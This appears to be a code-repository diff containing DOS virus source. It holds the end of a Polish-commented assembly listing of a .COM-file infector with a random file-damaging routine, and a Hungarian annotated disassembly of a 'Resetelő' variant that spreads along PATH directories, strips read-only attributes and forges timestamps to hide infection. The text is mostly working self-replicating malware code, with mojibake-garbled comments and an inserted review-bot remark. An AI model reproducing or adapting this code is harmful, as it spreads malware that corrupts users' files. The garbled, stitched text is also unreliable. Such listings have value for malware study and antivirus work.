jnc l2 ;czy poprawne otwarcie
|
||||
|
||||
jmp exit2
|
||||
|
||||
l2: mov bx,ax
|
||||
mov ax,5700h ;pobierz czas i date powstania zbioru
|
||||
int msdos
|
||||
mov [si+4],cx ;czas
|
||||
mov [si+6],dx ;data
|
||||
|
||||
mov ah,2Ch ;pobierz czas systemowy
|
||||
int msdos
|
||||
|
||||
and dh,7 ;sekundy
|
||||
jnz zostaw
|
||||
|
||||
comment ;
|
||||
**********************************************************
|
||||
tutaj mozna umiescic dowolna procedure uszkadzajaca zbior
|
||||
ta wywolywana jest losowo jesli ostatnie trzy bity sekund
|
||||
zegara systemu sa rowne zero np. 8,16,24 itd.
|
||||
**********************************************************
|
||||
;
|
||||
mov ah,write ;zapis do zbioru
|
||||
mov cx,5 ;pieciu bajtow lezacych
|
||||
mov dx,si ;juz poza programem czyli
|
||||
add dx,8Ah ;faktycznie dowolnych
|
||||
int msdos
|
||||
jmp exit3
|
||||
|
||||
;*********************************************************
|
||||
;koniec procedury uszkadzajacej zbior
|
||||
;*********************************************************
|
||||
|
||||
zostaw: mov ah,3Fh ;odczyt trzech pierwszych
|
||||
mov cx,3 ;bajtow z pliku
|
||||
mov dx,ofst_rozk ;do pola rozkazy
|
||||
add dx,si
|
||||
int msdos
|
||||
|
||||
jc exit3 ;jesli byl blad czytania
|
||||
|
||||
cmp ax,3 ;czy odczytano dokladnie
|
||||
jnz exit3 ;trzy bajty
|
||||
|
||||
mov ax,4202h ;przewiniecie zbioru na koniec
|
||||
mov cx,0
|
||||
mov dx,0
|
||||
int msdos
|
||||
|
||||
jc exit3 ;jesli blad
|
||||
|
||||
mov cx,ax ;w ax dlugosc zbioru
|
||||
sub ax,3
|
||||
;obiczanie przesuniecia dla skoku do poczatku wirusa
|
||||
;jest to adres konca zbioru minus 3 poniewaz
|
||||
;jmp jest trzy bajtowy
|
||||
|
||||
mov [si+0Eh],ax ;zapis adresu w polu skok
|
||||
|
||||
add cx,adr_baz - start + start_prg
|
||||
;obliczanie adresu poczatku danych (tego ktory jest w si)
|
||||
;jest to adres pola stare_DTA + 100h przesuniecia programu
|
||||
|
||||
mov di,si
|
||||
sub di,adr_baz - start - 1
|
||||
mov [di],cx ;zapisanie adresu bezposrednio w pole
|
||||
;w pole rozkazu mov dx,offset
|
||||
|
||||
mov ah,write ;dopisanie wirusa na koniec
|
||||
mov cx,wirus_len ;dlugosc wirusa
|
||||
mov dx,si
|
||||
sub dx,adr_baz - start ;obliczenie adresu poczatku wirusa
|
||||
int msdos
|
||||
|
||||
jc exit3 ;jesli blad
|
||||
cmp ax,wirus_len ;czy zapisano calego wirusa
|
||||
jnz exit3
|
||||
|
||||
mov ax,4200h ;przewiniecie zbioru na poczatek
|
||||
mov cx,0
|
||||
mov dx,0
|
||||
int msdos
|
||||
|
||||
jc exit3 ;jesli blad
|
||||
|
||||
mov ah,write ;zapis jmp do wirusa
|
||||
mov cx,3 ;na poczatku
|
||||
mov dx,si
|
||||
add dx,0Dh ;pole skok
|
||||
int msdos
|
||||
|
||||
exit1: mov dx,[si+6] ;data
|
||||
mov cx,[si+4] ;czas
|
||||
or cx,1Fh ;zaznaczenie ze zbior jest zarazony
|
||||
;ilosc sekund = 62
|
||||
|
||||
mov ax,5701h ;zapis daty i czasu do zbioru
|
||||
int msdos
|
||||
|
||||
mov ah,3Eh ;zamkniecie zbioru
|
||||
int msdos
|
||||
|
||||
exit2: mov ax,4301h ;ustawienie atrybutow
|
||||
mov cx,[si+8] ;stare atrybuty
|
||||
mov dx,001Fh
|
||||
add dx,si
|
||||
int msdos
|
||||
|
||||
exit3: push ds
|
||||
mov ah,1Ah ;ustaw adres DTA
|
||||
mov dx,[si+0] ;pole stare_DTA
|
||||
mov ds,es:[si+2]
|
||||
int msdos
|
||||
|
||||
pop ds
|
||||
|
||||
xor ax,ax ;zerowanie rejestrow
|
||||
xor bx,bx
|
||||
xor dx,dx
|
||||
xor si,si
|
||||
mov di,0100h ;na stos adres startu
|
||||
push di
|
||||
xor di,di
|
||||
ret
|
||||
|
||||
stare_DTA dd 0
|
||||
czas_zb dw 0
|
||||
data_zb dw 0
|
||||
attr_zb dw 0
|
||||
rozkazy db 0b4h,4ch,0cdh
|
||||
skok db 0e9h,0,0 ;kod rozkazu jmp
|
||||
zbior db '*.com',0
|
||||
srodow dw 0 ;adres srodowiska set
|
||||
bufor dw 0 ;wskaznik do nazwy zbioru
|
||||
path db 'PATH='
|
||||
nazwa_zb db 63 dup(0) ;pole na nazwe zbioru
|
||||
DTA db 43 dup(0) ;pole dta
|
||||
|
||||
code ends
|
||||
end st1
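Review bot: The comments in this listing are Polish in a DOS code page (CP852, judging by the mojibake in `¦r˘d’owy`, `wp’ywy`, `r˘§nice`), so the `AK:` annotations that record where this variant departs from the 648 original are unreadable as rendered; a first-line note such as `; Comments: Polish, CP852 encoding` or a one-time transcoding to UTF-8 would preserve that analysis. The `comment ;` block at the top states the key invariant for reading the code, that every data reference is relative to SI because the code runs at a varying offset, and it is worth repeating in English on the `adr_baz equ offset stare_DTA` line for readers who skip the Polish header.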
|
||||
|
|
@ -0,0 +1,669 @@
|
|||
|
||||
|
||||
A Resetel” vˇrus T”lt”get” f‚le mut nsa
|
||||
***************************************
|
||||
|
||||
|
||||
A Resetel” vˇrussal teljes eg‚sz‚ben megegyezik a fert”z” mechanizmus.
|
||||
Eltekintve att˘l, hogy ez a mut ns nem tesz t”nkre f jlokat. Az adatter<EFBFBD>let is
|
||||
ugyanazon a cˇmen van, ˇgy ugyanŁgy lehet ˇrtani, mint a Resetel”t. A v ltoz s:
|
||||
a vˇrus hossza 822 byte, minden indˇt s ut n az A:-r˘l megpr˘b lja beolvasni a
|
||||
BOOT-ot, majd a 40/80-dik s vot. Ha valamelyik T”lt”get”vel fert”z”tt, akkor
|
||||
elindˇtja a T”lt”get”t !
|
||||
|
||||
|
||||
;Ide (0100-ra) mutat a file elej‚r”l az ugr˘ utasˇt s.
|
||||
|
||||
;Els” feladat: az els” 3 byte visszaˇr sa az eredetire.
|
||||
|
||||
0100 51 PUSH CX ;CX a stacken marad mindv‚gig.
|
||||
;A k”vetkez” utasˇt s operandus t ( jelen esetben 02F9-et )
|
||||
;fert”z‚skor llˇtja be , ˇgy mindig a helyes cˇmre mutat.
|
||||
0101 BAF902 MOV DX,02F9 ;Eredeti els” 3 byte cˇme-10h
|
||||
0104 FC CLD ;( ERE_DTA_OFS)
|
||||
0105 8BF2 MOV SI,DX
|
||||
0107 81C60A00 ADD SI,000A ;SI=offset ERE_KEZD
|
||||
010B BF0001 MOV DI,0100 ;Program eleje
|
||||
010E B90300 MOV CX,0003 ;3 byte
|
||||
0111 F3 REPZ
|
||||
0112 A4 MOVSB ;Az eredeti byteok vissza llˇt sa
|
||||
|
||||
|
||||
;-----------------------------------------
|
||||
; Install ci˘s r‚sz:
|
||||
;-----------------------------------------
|
||||
|
||||
;DOS verzi˘ lek‚rdez‚se. 1.00-n l kisebb verzi˘n l az eredeti
|
||||
;program futtat sa: ekkor a vˇrus nem m<>k”dik.
|
||||
|
||||
0113 8BF2 MOV SI,DX ;Ezut n SI-ben az adatter<65>let cˇme
|
||||
0115 B430 MOV AH,30
|
||||
0117 CD21 INT 21 ;DOS verzi˘ lek‚rdez‚se
|
||||
0119 3C00 CMP AL,00 ;Csak 1.00-n l kisebbn‚l l‚p ki
|
||||
011B 7503 JNZ 0120
|
||||
011D E9C701 JMP 02E7 ;Eredeti program futtat sa
|
||||
|
||||
|
||||
;Disk Transzfer Address lek‚rdez‚se, elment‚se
|
||||
|
||||
0120 06 PUSH ES
|
||||
0121 B42F MOV AH,2F
|
||||
0123 CD21 INT 21 ;DTA leolvas sa (ES:BX), meg”rz‚se
|
||||
0125 899C0000 MOV [SI+0000],BX ;ERE_DTA_OFS (02F9)
|
||||
0129 8C840200 MOV [SI+0002],ES ;ERE_DTA_SEG (02FB)
|
||||
|
||||
;-------------------------------------------------------
|
||||
; A beiktatott behŁz˘ r‚sz
|
||||
;-------------------------------------------------------
|
||||
|
||||
012D E85802 CALL 0388
|
||||
0130 07 POP ES
|
||||
|
||||
;DTA be llˇt sa ENTRY cˇm‚re (0358). Igy a FindFirst, FindNext
|
||||
;DOS funkci˘k ide fogj k m solni a file adatait (nev‚t,idej‚t,
|
||||
;hossz t,stb).
|
||||
|
||||
0131 BA5F00 MOV DX,005F
|
||||
;{Val˘szˇn<CB87>leg r‚gi assemblerrel ˇrt k a vˇrust, ez‚rt van itt
|
||||
;egy NOP utasˇt s.}
|
||||
0134 90 NOP
|
||||
0135 03D6 ADD DX,SI
|
||||
0137 B41A MOV AH,1A
|
||||
0139 CD21 INT 21 ;DTA llˇt sa DS:DX-re: ENTRY(0358)
|
||||
|
||||
|
||||
;A PATH-ok cˇm‚nek megkeres‚se. Ha az aktu lis k”nyvt rban m r
|
||||
;mindegyik filet megfert”zte , itt taj lja meg azoknak az al-
|
||||
;k”nyvt raknak a nev‚t , amelyekben m‚g megfert”zend” fileokat
|
||||
;tal lhat.
|
||||
|
||||
013B 06 PUSH ES
|
||||
013C 56 PUSH SI
|
||||
013D 8E062C00 MOV ES,[002C];Environment (k”rnyezet) segmense
|
||||
0141 BF0000 MOV DI,0000 ;ES:DI fog a megfelel” helyre
|
||||
;(a k”vetkez” directoryra) mutatni
|
||||
|
||||
|
||||
;A k”vetkez” r‚sz a PATH= sz”veget keresi meg az environment
|
||||
;ter<65>leten:
|
||||
|
||||
0144 5E POP SI
|
||||
0145 56 PUSH SI
|
||||
0146 81C61A00 ADD SI,001A ;STR_PATH (0313)
|
||||
014A AC LODSB ;AL=DS:[SI],SI++
|
||||
014B B90080 MOV CX,8000 ;max 32k az environment
|
||||
014E F2 REPNZ
|
||||
014F AE SCASB ;AL-ES:[DI] Megkeresi a k”vetkez”
|
||||
;'P' bet<65>t
|
||||
0150 B90400 MOV CX,0004 ;M‚g 4 bet<65> azonosˇt sa
|
||||
0153 AC LODSB ;AL=DS:[SI],SI++
|
||||
0154 AE SCASB ;AL-ES:[DI],DI++
|
||||
0155 75ED JNZ 0144 ;Ugr s, ha a k”vetkez” 4 bet<65> nem
|
||||
;egyezik (nem 'ATH=')
|
||||
0157 E2FA LOOP 0153
|
||||
0159 5E POP SI ;ES:DI mutat az els” PATH-ra
|
||||
015A 07 POP ES
|
||||
015B 89BC1600 MOV [SI+0016],DI ;PATH_MUT (030F)
|
||||
|
||||
|
||||
015F 8BFE MOV DI,SI ;{Hogy ez minek ? K‚s”bb Łgyis
|
||||
0161 81C71F00 ADD DI,001F ;fel<65>lˇrja} FILE_PATH (0318)
|
||||
0165 8BDE MOV BX,SI ;Ezut n BX mutat az adatokra
|
||||
0167 81C61F00 ADD SI,001F ;SI is a FILE_PATH-ra(0318) mutat
|
||||
016B 8BFE MOV DI,SI ;{Az el”bb m r be llitotta (?)}
|
||||
016D EB3A JMP 01A9
|
||||
|
||||
|
||||
;A k”vetkez” PATH-ban megadott aldirectoryt FILE_PATH-ra m -
|
||||
;solja. Igy a k”vetkez” fileokat m r ebben az aldirectoryban
|
||||
;fogja keresni.
|
||||
|
||||
016F 83BC160000 CMP WORD PTR [SI+0016],+00 ;PATH_MUT (030F)
|
||||
0174 7503 JNZ 0179
|
||||
0176 E96001 JMP 02D9 ;Ugr s, ha nincs t”bb PATH aldir.
|
||||
;(mindet megfert”te m r)
|
||||
0179 1E PUSH DS
|
||||
017A 56 PUSH SI
|
||||
017B 26 ES:
|
||||
017C 8E1E2C00 MOV DS,[002C] ;Environment segmense
|
||||
0180 8BFE MOV DI,SI ;(02F9)
|
||||
0182 26 ES:
|
||||
0183 8BB51600 MOV SI,[DI+0016] ;PATH_MUT (030F)
|
||||
0187 81C71F00 ADD DI,001F ;FILE_PATH cˇme (0318)
|
||||
018B AC LODSB ;AL=DS:[SI] SI++
|
||||
018C 3C3B CMP AL,3B ;';'
|
||||
018E 740A JZ 019A
|
||||
0190 3C00 CMP AL,00
|
||||
0192 7403 JZ 0197
|
||||
0194 AA STOSB ;ES:[DI]:=AL DI++
|
||||
0195 EBF4 JMP 018B ;Źtm sol s ';' vagy #0-ig
|
||||
|
||||
;#0-val z rult a PATH bejegyz‚s => nem lesz t”bb
|
||||
0197 BE0000 MOV SI,0000
|
||||
019A 5B POP BX ;Ezut n BX mutat az adatokra
|
||||
019B 1F POP DS
|
||||
019C 89B71600 MOV [BX+0016],SI ;PATH_MUT (030F) = 0
|
||||
;( Nincs t”bb PATH jelz‚s )
|
||||
|
||||
;A k”vetkez” PATH-ban adott aldir. m r tm solva.
|
||||
01A0 807DFF5C CMP BYTE PTR [DI-01],5C
|
||||
01A4 7403 JZ 01A6 ;Ugr s, ha az ut˘ls˘ bet<65> a '\'
|
||||
01A6 B05C MOV AL,5C ;Egy‚bk‚nt '\' ˇr s
|
||||
01A8 AA STOSB ;ES:[DI]:=AL DI++
|
||||
|
||||
|
||||
|
||||
|
||||
;Egy aldirectory ki‚rt‚kel‚se . El”sz”r az aktu lis , majd a
|
||||
;FILE_PATH -ra m solt aldirectory v‚gign‚z‚se, fert”z‚s.
|
||||
;DI a FILE_PATH-ba ˇrt aldirectory neve ut ni pozici˘ra mutat.
|
||||
|
||||
|
||||
;A COM kiterjeszt‚s<E2809A> fileok megkeres‚se:
|
||||
|
||||
01A9 89BF1800 MOV [BX+0018],DI ;FILE_NEV_MUT (0311)
|
||||
;Ide kell majd a file nev‚t
|
||||
;m solni (az aldir. neve ut n)
|
||||
01AD 8BF3 MOV SI,BX ;(02F9)
|
||||
01AF 81C61000 ADD SI,0010 ;KERES_STR (0309)
|
||||
01B3 B90600 MOV CX,0006 ;6 bet<65> tm sol sa ('*.COM',0)
|
||||
01B6 F3 REPZ ;A PATH-ban megadott aldirectory
|
||||
01B7 A4 MOVSB ;m”g‚ , ˇgy teljes keres‚si utunk
|
||||
;lesz
|
||||
01B8 8BF3 MOV SI,BX ;(02F9)
|
||||
01BA B44E MOV AH,4E ;FIND FIRST ENTRY
|
||||
01BC BA1F00 MOV DX,001F
|
||||
01BF 90 NOP
|
||||
01C0 03D6 ADD DX,SI ;FILE_PATH (0318)
|
||||
01C2 B90300 MOV CX,0003 ;HIDDEN, READ ONLY
|
||||
01C5 CD21 INT 21 ;Az els” COM kiterjeszt‚s<E2809A> file
|
||||
;megkeres‚se . A file adatait a DTA
|
||||
; ltal mutatott cˇmre (ENTRY 0358)
|
||||
;m solja.
|
||||
01C7 EB04 JMP 01CD
|
||||
|
||||
|
||||
;K”vetkez” COM file keres‚se (adatai ENTRY-re ker<65>lnek).
|
||||
|
||||
01C9 B44F MOV AH,4F ;FIND NEXT
|
||||
01CB CD21 INT 21
|
||||
01CD 7302 JNB 01D1
|
||||
01CF EB9E JMP 016F ;Ha nem tal l t”bb COM filet : —j
|
||||
;aldirt keres a PATH-ban
|
||||
|
||||
|
||||
;M r tal lt COM filet. Adataival az ENTRY fel van t”ltve.Ennek
|
||||
;a filenak az ellen”rz‚se, fert”z‚se k”vetkezik.
|
||||
|
||||
;Annak ellen”rz‚se , hogy a file megfert”zhet”-e (fert”z”tt-e,
|
||||
;tŁl hosszŁ-e, tŁl r”vid-e) . Ha nem fert”zhet” visszaugrik Łj
|
||||
;fileokat keresni.
|
||||
|
||||
01D1 8B847500 MOV AX,[SI+0075] ;ENT_IDO (036E) A file ideje
|
||||
01D5 241F AND AL,1F
|
||||
01D7 3C1F CMP AL,1F ;Ugr s, ha az als˘ 5 bit 1-es:
|
||||
01D9 74EE JZ 01C9 ;a file m r fert”z”tt.
|
||||
01DB 81BC790000FA CMP WORD PTR [SI+0079],FA00 ;ENT_HOSSZ (0372)
|
||||
01E1 77E6 JA 01C9 ;Ugr s, ha file hossza nagyobb,mint
|
||||
;64000h (m r nem f‚r bele a vˇrus)
|
||||
01E3 83BC79000A CMP WORD PTR [SI+0079],+0A ;ENT_HOSSZ (0372)
|
||||
01E8 72DF JB 01C9 ;Ugr s, ha r”videbb 10h byten l
|
||||
|
||||
|
||||
;-----------------------------------------
|
||||
; Megvan a kiv laszott file.
|
||||
;-----------------------------------------
|
||||
|
||||
;A file nev‚t az aldirectory neve ut n kell m solni , hogy a
|
||||
;teljes Łt rendelkez‚s<E2809A>nkre lljon , ˇgy majd meg tudja nyitni
|
||||
;a filet.
|
||||
01EA 8BBC1800 MOV DI,[SI+0018] ;FILE_NEV_MUT (0311) Ide fogja
|
||||
01EE 56 PUSH SI ;a file nev‚t m solni
|
||||
01EF 81C67D00 ADD SI,007D ;ENT_NEV (0376)
|
||||
|
||||
01F3 AC LODSB ;AL:=DS:[SI] SI++
|
||||
01F4 AA STOSB ;ES:[DI]:=AL DI++ (M sol s)
|
||||
01F5 3C00 CMP AL,00 ;N‚vlez r˘ 0-ig m sol
|
||||
01F7 75FA JNZ 01F3
|
||||
01F9 5E POP SI ;SI Łjra az adatokra mutat
|
||||
|
||||
|
||||
;A file egyes eredeti inform ci˘inak meg”rz‚se , hogy a fert”-
|
||||
;z‚s ne t<>nj”n fel.
|
||||
|
||||
;Az eredeti attributtum meg”rz‚se:
|
||||
|
||||
;{Fogalmam sincs mi‚rt kell a file attributtum t m‚g egyszer
|
||||
;lek‚rdezni , amikor az ENTRY ter<65>leten megtal lhat˘ . Tal n a
|
||||
;vˇrus ˇr˘ja nem tudta?}
|
||||
01FA B80043 MOV AX,4300 ;File attributtum nak lek‚rdez‚se
|
||||
01FD BA1F00 MOV DX,001F ;FILE_PATH ([SI+1F] 0318)
|
||||
0200 90 NOP ;{piszok}
|
||||
0201 03D6 ADD DX,SI ;DS:DX mutat a file Łtj ra
|
||||
0203 CD21 INT 21 ;CX-ben az attributtum
|
||||
0205 898C0800 MOV [SI+0008],CX ;ERE_ATTR (0301)
|
||||
|
||||
|
||||
;A file ˇr sv‚delm‚nek t”rl‚se:
|
||||
|
||||
0209 B80143 MOV AX,4301 ;File attributtum nak llit sa
|
||||
020C 81E1FEFF AND CX,FFFE ;Read Only jelz‚s t”rl‚se
|
||||
0210 BA1F00 MOV DX,001F ;{ Az el”bb m r be llˇtotta, minek
|
||||
0213 90 NOP ;Łjra? }
|
||||
0214 03D6 ADD DX,SI ;FILE_PATH (0318)
|
||||
0216 CD21 INT 21
|
||||
|
||||
|
||||
;File megnyit sa:
|
||||
|
||||
0218 B8023D MOV AX,3D02 ;File megnyit sa ˇr sra, olvas sra
|
||||
021B BA1F00 MOV DX,001F ;{M‚g egyszer be llˇtja!}
|
||||
021E 90 NOP ;{piszok}
|
||||
021F 03D6 ADD DX,SI ;FILE_PATH (0318)
|
||||
0221 CD21 INT 21
|
||||
0223 7303 JNB 0228
|
||||
0225 E9A200 JMP 02CA ;Hib n l: nincs fert”z‚s
|
||||
0228 8BD8 MOV BX,AX ;Handle
|
||||
|
||||
|
||||
;A file eredeti (mostani) idej‚nek lek‚rdez‚se:
|
||||
|
||||
;{Ez is megtal lhat˘ lenne az ENTRY ter<65>leten!}
|
||||
022A B80057 MOV AX,5700 ;Get Date & Time
|
||||
022D CD21 INT 21
|
||||
022F 898C0400 MOV [SI+0004],CX ;ERE_TIME (02FD)
|
||||
0233 89940600 MOV [SI+0006],DX ;ERE_DATE (02FF)
|
||||
|
||||
|
||||
;Annak eld”nt‚se , hogy a kiv lasztott filet t”nkretegye-e ,
|
||||
;vagy megfert”zze . Lek‚rdezi a jelenlegi id”t , ‚s ha m sod-
|
||||
;perceinek sz ma 8-cal oszthat˘ , akkor a filet resetel”v‚ te-
|
||||
;szi, egy‚bk‚nt pedig megfert”zi. Igy az esetek 2/15-”d r‚sz‚-
|
||||
;ben teszi csak t”nkre a filet.
|
||||
|
||||
0237 B42C MOV AH,2C ;A mostani id” lek‚rdez‚se
|
||||
0239 CD21 INT 21
|
||||
023B 80E607 AND DH,07 ;A m sodpercek als˘ 3 bitje
|
||||
023E EB0D JMP 024D ;Fert”z‚s
|
||||
0240 90 NOP
|
||||
|
||||
|
||||
; Szem‚t a Reselet”lb”l
|
||||
|
||||
0241 B440 MOV AH,40
|
||||
0243 B90500 MOV CX,0005
|
||||
0246 8BD6 MOV DX,SI
|
||||
0248 81C28A00 ADD DX,008A
|
||||
024C 90 NOP
|
||||
|
||||
;-----------------------------------------
|
||||
; Fert”z‚s:
|
||||
;-----------------------------------------
|
||||
|
||||
|
||||
;Az eredeti file els” 3 bytej nak meg”rz‚se , hogy k‚s”bb m‚g
|
||||
;futtatni lehessen.
|
||||
024D B43F MOV AH,3F ;Olvas s fileb˘l
|
||||
024F B90300 MOV CX,0003 ;Az els” 3 byte beolvas sa
|
||||
0252 BA0A00 MOV DX,000A
|
||||
0255 90 NOP ;{piszok}
|
||||
0256 03D6 ADD DX,SI ;ERE_KEZD (0303)
|
||||
0258 CD21 INT 21
|
||||
025A 7255 JB 02B1 ;Hib n l v‚ge
|
||||
025C 3D0300 CMP AX,0003
|
||||
025F 7550 JNZ 02B1 ;Hib n l v‚ge
|
||||
|
||||
|
||||
;File v‚g‚re ll s, az Łj cˇmek kisz mˇt sa:
|
||||
|
||||
0261 B80242 MOV AX,4202 ;File Pointer file v‚g‚re llˇt sa
|
||||
0264 B90000 MOV CX,0000
|
||||
0267 BA0000 MOV DX,0000
|
||||
026A CD21 INT 21
|
||||
026C 7243 JB 02B1 ;{Itt nem nagyon lehet hiba!}
|
||||
|
||||
|
||||
;A file elej‚re irand˘ JMP operandus nak kisz mˇt sa:
|
||||
|
||||
026E 8BC8 MOV CX,AX ;AX-ben a file hossza
|
||||
0270 2D0300 SUB AX,0003 ;AX-ben az eltol s a JMP utasˇt s-
|
||||
;hoz, ahhoz amit a file elej‚re fog
|
||||
;majd ˇrni . Igy ez a JMP a file
|
||||
;mostani v‚ge ut ni bytera fog mu-
|
||||
;tatni.
|
||||
0273 89840E00 MOV [SI+000E],AX ;CIM_JMP (0307)
|
||||
|
||||
|
||||
;Az Łj fileon bel<65>li adatter<65>let cˇm‚nek kisz mˇt sa ‚s be l-
|
||||
;lˇt sa:
|
||||
|
||||
0277 81C1F902 ADD CX,02F9 ;CX az Łj fileon bel<65>li adatter<65>-
|
||||
027B 8BFE MOV DI,SI ;letre mutat.
|
||||
027D 81EFF701 SUB DI,01F7 ;A vˇrus els” utasˇt s nak (MOV DX,
|
||||
;02F9) operandus nak cˇme.
|
||||
0281 890D MOV [DI],CX ;Ide ˇrja az adatter<65>let cˇm‚t
|
||||
|
||||
|
||||
;-----------------------------------------
|
||||
; A vˇrus hozz m solja mag t a filehoz:
|
||||
;-----------------------------------------
|
||||
|
||||
;(A filemutat˘ a file v‚g‚re mutat.)
|
||||
0283 B440 MOV AH,40 ;Ir s fileba.
|
||||
0285 B93603 MOV CX,0336 ;822 byte (a vˇrus hossza)
|
||||
0288 8BD6 MOV DX,SI
|
||||
028A 81EAF901 SUB DX,01F9 ;DX a vˇrus els” bytej ra mutat
|
||||
028E CD21 INT 21
|
||||
0290 721F JB 02B1 ;Hib n l v‚ge
|
||||
0292 3D3603 CMP AX,0336
|
||||
0295 751A JNZ 02B1 ;Ha nem ˇrta ki mind a 648 byteot
|
||||
|
||||
|
||||
;Az els” 3 byte t llˇt sa, egy a file v‚g‚re mutat˘ ugr˘ uta-
|
||||
;sˇt sra:
|
||||
|
||||
0297 B80042 MOV AX,4200 ;A file pointer a file elej‚re!
|
||||
029A B90000 MOV CX,0000
|
||||
029D BA0000 MOV DX,0000
|
||||
02A0 CD21 INT 21
|
||||
02A2 720D JB 02B1 ;{Itt sem lehet hiba!}
|
||||
|
||||
02A4 B440 MOV AH,40 ;Ir s fileba
|
||||
02A6 B90300 MOV CX,0003 ;3 byte
|
||||
02A9 8BD6 MOV DX,SI
|
||||
02AB 81C20D00 ADD DX,000D ;B_JMP (0306) DX az ugr˘ utasˇt sra
|
||||
02AF CD21 INT 21 ;mutat
|
||||
|
||||
|
||||
;Az eredeti id” ( m r a fert”z‚sjelz‚ssel egy<67>tt ) vissza llˇ-
|
||||
;t sa:
|
||||
|
||||
02B1 8B940600 MOV DX,[SI+0006] ;ERE_DATE (02FF)
|
||||
02B5 8B8C0400 MOV CX,[SI+0004] ;ERE_TIME (027D)
|
||||
02B9 81E1E0FF AND CX,FFE0 ;{Teljesen felesleges!}
|
||||
02BD 81C91F00 OR CX,001F ;M r volt fert”zve jelz‚s
|
||||
02C1 B80157 MOV AX,5701 ;Set Date & Time
|
||||
02C4 CD21 INT 21
|
||||
|
||||
|
||||
;A file lez r sa:
|
||||
|
||||
02C6 B43E MOV AH,3E ;Close Handle
|
||||
02C8 CD21 INT 21
|
||||
|
||||
|
||||
;Az eredeti attributtum vissza llˇt sa:
|
||||
|
||||
02CA B80143 MOV AX,4301 ;Set File Attributtum
|
||||
02CD 8B8C0800 MOV CX,[SI+0008] ;ERE_ATTR (0301)
|
||||
02D1 BA1F00 MOV DX,001F
|
||||
02D4 90 NOP
|
||||
02D5 03D6 ADD DX,SI ;FILE_PATH (0318)
|
||||
02D7 CD21 INT 21
|
||||
|
||||
|
||||
;DTA vissza llˇt sa az eredeti cˇmre:
|
||||
|
||||
02D9 1E PUSH DS
|
||||
02DA B41A MOV AH,1A ;Set DTA
|
||||
02DC 8B940000 MOV DX,[SI+0000] ;ERE_DTA_OFS (02F9)
|
||||
02E0 8E9C0200 MOV DS,[SI+0002] ;ERE_DTA_SEG (02FB)
|
||||
02E4 CD21 INT 21
|
||||
02E6 1F POP DS
|
||||
|
||||
|
||||
;-----------------------------------------
|
||||
; Az eredeti program futtat sa:
|
||||
;-----------------------------------------
|
||||
|
||||
02E7 59 POP CX ;CX vissza llˇt sa
|
||||
02E8 33C0 XOR AX,AX ;Regiszterek null z sa
|
||||
02EA 33DB XOR BX,BX
|
||||
02EC 33D2 XOR DX,DX
|
||||
02EE 33F6 XOR SI,SI
|
||||
02F0 BF0001 MOV DI,0100
|
||||
02F3 57 PUSH DI ;0100 a stackre
|
||||
02F4 33FF XOR DI,DI
|
||||
02F6 C2FFFF RET FFFF ;100-on folytat˘dik a vez‚rl‚s
|
||||
;SP-- {Hogy minek?}
|
||||
|
||||
|
||||
|
||||
;-----------------------------------------
|
||||
; ADAT TERšLET
|
||||
;-----------------------------------------
|
||||
|
||||
|
||||
;Ide mutat (02F9-re) a vˇrus elej‚n DX, k‚s”bb SI,BX.
|
||||
|
||||
02F9 ERE_DTA_OFS DW (?) ;[SI+00] Eredeti DTA cˇme
|
||||
02FB ERE_DTA_SEG DW (?) ;[SI+02]
|
||||
|
||||
02FD ERE_TIME DW (?) ;[SI+04] A file eredeti ideje,
|
||||
02FF ERE_DATE DW (?) ;[SI+06] d tuma,
|
||||
0301 ERE_ATTR DW (?) ;[SI+08] attributtuma
|
||||
|
||||
0303 ERE_KEZD DB 3 DUP (?) ;[SI+0A]
|
||||
;A file eredeti els” 3 byteja.
|
||||
|
||||
;A k”vetkez” 3 byteon lesz az a 3 byte , amit a vˇrus egy meg-
|
||||
;fert”zend” file elej‚re fog ˇrni.
|
||||
|
||||
0306 B_JMP DB E9 ;[SI+0D]
|
||||
;JMP g‚pik˘dja
|
||||
0307 CIM_JMP DW (?) ;Eltol s (JMP operandusa)
|
||||
|
||||
0309 KERES_STR DB '*.COM',0 ;[SI+10]
|
||||
;Ezt a stringet m solja a
|
||||
;FILE_NEV_MUT cˇmre
|
||||
|
||||
030F PATH_MUT DW (?) ;[SI+16]
|
||||
;Hol a k”vetkez” aldirectory neve
|
||||
;az environmenten.
|
||||
|
||||
0311 FILE_NEV_MUT DW (?) ;[SI+18]
|
||||
;Az tm solt aldirectory m”g‚ mu-
|
||||
;tat.
|
||||
;Azt mutatja , hogy hova kell a
|
||||
;keres‚si stringet(*.COM), majd a
|
||||
;file nev‚t m solni a FILE_PATH-
|
||||
;on bel<65>l ahhoz, hogy teljes utat
|
||||
;kapjunk.
|
||||
|
||||
0313 STR_PATH DB 'PATH=' ;[SI+1A] Ezt a stringet keresi az
|
||||
;environment ter<65>leten.
|
||||
|
||||
0318 FILE_PATH DB 40 DUP (?);[SI+1F]
|
||||
;Itt lesz majd a keres‚si string
|
||||
;‚s a fert”zend” file neve Łttal
|
||||
;egy<67>tt.
|
||||
|
||||
|
||||
;Ide mutat a DTA. Ezt a ter<65>letet fogja a DOS a file adataival
|
||||
;felt”lteni.
|
||||
|
||||
0358 ENTRY DB 15 DUP (?);Fenntartott [SI+5F]
|
||||
036D ENT_ATTR DB (?) ;Attributtum [SI+74]
|
||||
036E ENT_IDO DW (?) ;Keletkez‚s ideje [SI+75]
|
||||
0370 ENT_DATUM DW (?) ;Keletkez‚s d tuma [SI+77]
|
||||
0372 ENT_HOSSZ DW (?) ;Als˘ sz˘ [SI+79]
|
||||
0374 DW (?) ;Fels” sz˘ [SI+7B]
|
||||
0376 ENT_NEV DB 0D DUP (?);Megtal lt file neve [SI+7D]
|
||||
|
||||
0383 RESET DB EA,F0,FF,00,F0 ;JMP F000:FFF0 [SI+8A]
|
||||
;Nem haszn lja
|
||||
|
||||
;----------------------------------------------------
|
||||
; A T”lt”get”t behŁz˘ r‚sz
|
||||
;----------------------------------------------------
|
||||
|
||||
|
||||
0388 50 PUSH AX ;Regiszterek elment‚se
|
||||
0389 53 PUSH BX
|
||||
038A 51 PUSH CX
|
||||
038B 52 PUSH DX
|
||||
038C 06 PUSH ES
|
||||
038D 1E PUSH DS
|
||||
038E 57 PUSH DI
|
||||
038F 56 PUSH SI
|
||||
0390 E80000 CALL 0393 ;Lebuk s !! (/g)
|
||||
0393 5B POP BX ;BX=0393
|
||||
|
||||
;A: BOOT beolvas sa/T”lt”get” lek‚rdez‚se
|
||||
|
||||
0394 BEA55A MOV SI,5AA5 ;T”lt”get” lek‚rdez‚se
|
||||
0397 BFAA55 MOV DI,55AA
|
||||
